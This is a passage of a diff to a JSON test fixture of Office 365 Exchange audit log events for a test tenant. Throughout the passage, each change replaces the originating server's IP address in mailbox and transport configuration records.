"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3020,7 +3020,7 @@
 "Operation": "Set-TransportConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -3046,7 +3046,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:06\",\"ExternalAccess\":true,\"Id\":\"627aa8ff-1411-475d-d202-08d7ac0f08a5\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance\",\"Operation\":\"New-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3058,7 +3058,7 @@
 "Operation": "New-ExchangeAssistanceConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -3084,7 +3084,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3096,7 +3096,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "ProhibitSendReceiveQuota",
@@ -3178,7 +3178,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3190,7 +3190,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3264,7 +3264,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3276,7 +3276,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3350,7 +3350,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3362,7 +3362,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -3436,7 +3436,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -3448,7 +3448,7 @@
